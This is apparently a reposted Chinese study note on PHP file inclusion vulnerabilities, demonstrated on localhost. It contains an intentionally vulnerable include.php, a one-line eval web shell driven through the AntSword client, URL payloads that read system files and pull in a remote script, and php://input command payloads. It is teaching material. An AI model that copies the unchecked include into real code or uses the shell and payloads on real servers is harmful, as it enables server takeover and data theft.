文件包含漏洞学习笔记

这篇具有很好参考价值的文章主要介绍了文件包含漏洞学习笔记。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1、为何会出现文件包含漏洞

相同内容或方法在多个页面显示或调用,文件包含漏洞又称为目录遍历漏洞或任意文件访问漏洞。分为本地文件包含(LFI:Local File Inclusion),远程文件包含(RFI:Remote File  Inclusion),也可分为静态文件包含,动态文件包含。

2、静态文件包含

页面中直接引用静态文件。

main.php内容如下:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Home</title>
  </head>	
  <body>
    <h1>这是你第二次访问本网站</h1>
    <p>为何用TextEditor编写的汉字打开就乱码?</p>
    <p>欢迎下次再来!</p>
    <?php include 'footer.php'; ?>
  </body>
</html>

footer.php文件内容如下:

<?php 
header("content-type:text/html;charset=utf-8");
echo "<p>copyright @ 2023-".date("Y")."测试网</p>"; 
?>

静态文件包含效果:

浏览器访问:  http://127.0.0.1/fileinc/main.php?

文件包含漏洞学习笔记

 3、动态文件包含

被包含的文件通过参数传入,增加了页面包含的灵活性。

include.php文件内容如下:

<?php
    $file = $_GET['file'];
    if(isset($file)){
        include("$file");
    }else{
        echo "file fail!";
    }
?>

动态文件包含效果:

浏览器访问:  http://127.0.0.1/fileinc/include.php?file=footer.php

文件包含漏洞学习笔记

4、 漏洞利用

可以访问系统敏感文件,也可以包含恶意代码文件或图片码。

漏洞利用效果:

浏览器访问: http://127.0.0.1/fileinc/include.php?file=C:\Windows\system.ini ,访问网站所在服务器的C:\Windows\system.ini中的敏感信息。

文件包含漏洞学习笔记

shell.php文件内容如下:

<?php
    header("Content-type:text/html;charset=gb1232");
    echo "<pre>";
    @eval($_POST['shell']);
?>

漏洞利用效果:

浏览器访问:  http://127.0.0.1/fileinc/include.php?file=shell.php ,可以通过“中国蚁剑”来访问服务器资源。即利用上传的木马获取服务器shell执行权限。

文件包含漏洞学习笔记

文件包含漏洞学习笔记

 5、远程文件包含

 远程文件包含的前提,需要将php.in中如下2个配置选项启用,

allow_url_fopen=On,allow_url_include=On

远程文件包含效果:

浏览器访问:http://127.0.0.1/fileinc/include.php?file=http://remote.include.com/fileremote/info.php ,这个远程文件可以是获取phpinfo信息,也可以是一句话木马……

文件包含漏洞学习笔记

 6、涉及到的文件包含函数

include()                          包含并运行指定文件

include_once()                只包含一次,不重复包含

require()                          和include()一样,不过出错时会停止

require_once()                和include_once()一样,不过出错时会停止

fopen()                             打开文件或者url

readfile()                           读取文件并写入到输出缓冲

highlight_file()                  语法高亮一个文件

show_source()                 语法高亮一个文件

file_get_contents()           将整个文件读入一个字符串

file()                                   把整个文件读入一个数组中

7、涉及到的PHP伪协议

file://        访问本地文件系统

http://       访问http或https网址

ftp://          访问ftp或ftps网址

php://       访问各个输入或输出流(I/O Streams)

zlib://         访问压缩流

data://        访问数据(RFC 2397)

glob://        查找匹配的文件路径模式

phar://        PHP归档

ssh2://       安全外壳协议2

rar://           RAR

ogg://         音频流

expect://    处理交互式的流

使用说明请参考:https://www.php.net/manual/zh/wrappers.php

注意:

php://input 可以使用抓包工具,添加输入流信息(如:<?php system('ls /'); ?> 或 <?= system(cat /filename); ?> 或 <?= `ls /`; ?>)。文章来源地址https://www.toymoban.com/news/detail-401607.html

到了这里,关于文件包含漏洞学习笔记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • 文件包含漏洞利用思路

    文件包含漏洞利用思路

    通过 PHP 函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,导致意外的文件泄漏甚至恶意代码注入。 php中常见的文件包含函数有以下四种: include() require() include_once() require_once() include与require基本是相同的,除了错误处理方面: include(),只生成

    2024年02月16日
    浏览(13)
  • 文件包含漏洞相关协议详解

    文件包含漏洞相关协议详解

    今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! 首先,我们来介绍以下文件

    2024年02月13日
    浏览(10)
  • 文件包含漏洞

    文件包含漏洞

    漏洞讲解 漏洞过程解析 在使用include等包含函数时,当对包含文件的来源过滤不严格,那么会包含到恶意文件,攻击者将会通过这个恶意文件来到达他想要达到的相应目的。 引用一句网上看到的话:文件包含漏洞和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,

    2024年02月19日
    浏览(11)
  • 文件包含漏洞全面详解

    文件包含漏洞全面详解

    1.文件包含漏洞概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。 什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需

    2024年02月02日
    浏览(8)
  • DVWA之文件包含漏洞

    DVWA之文件包含漏洞

    1、什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 2、文件包含漏洞 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行

    2024年02月04日
    浏览(9)
  • 【web安全】文件包含漏洞

    【web安全】文件包含漏洞

    目录 1.什么是文件包含漏洞 2.产生原因 3.文件包含的类型 3.1本地文件包含 3.2远程文件包含 4.攻击利用手法 4.1 file:协议 4.2 php://协议 ​4.3 zip://,bzip2://,zlib://协议  4.4 data://协议 4.5 PHP伪协议总结  5.如何防御? 6.常见系统的默认路径 7.文件包含漏洞的奇技淫巧 LFI+日志文件gets

    2024年02月07日
    浏览(11)
  • 文件包含漏洞利用和防御

    使用函数包含指定文件的代码,没对函数的参数进行过滤,可被用户控制包含恶意文件并执行代码 漏洞分类 本地文件包含:目录遍历、任意文件读取、包含日志文件getshell、图片马getshell、伪协议读取文件/命令执行、包含phpinfo上传的临时文件 远程文件包含:远程木马getshe

    2024年02月02日
    浏览(36)
  • 文件包含漏洞讲解

    文件包含即程序通过包含函数调用本地或远程文件,以此来实现拓展功能。 本地文件包含 常见的文件包含漏洞的形式为 ?php include(\\\"inc/\\\" . $_GET[\\\'file\\\']); ? 考虑常用的几种包含方式为 同目录包含file=.htaccess 目录遍历?file=…/…/…/…/…/…/…/…/…/var/lib/locate.db 日志注入?file=…/…

    2024年01月20日
    浏览(10)
  • pearcmd文件包含漏洞

    pearcmd文件包含漏洞

    pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定 --with-pear 才会安装 不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在 /usr/local/lib/php 原本pear/pcel是一个命

    2024年01月21日
    浏览(8)
  • 【漏洞复现】E-office文件包含漏洞

    【漏洞复现】E-office文件包含漏洞

    Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。泛微 E-Office 是一款标准化的协同 OA 办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。 该漏洞是由于存在文件包含

    2024年02月09日
    浏览(9)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包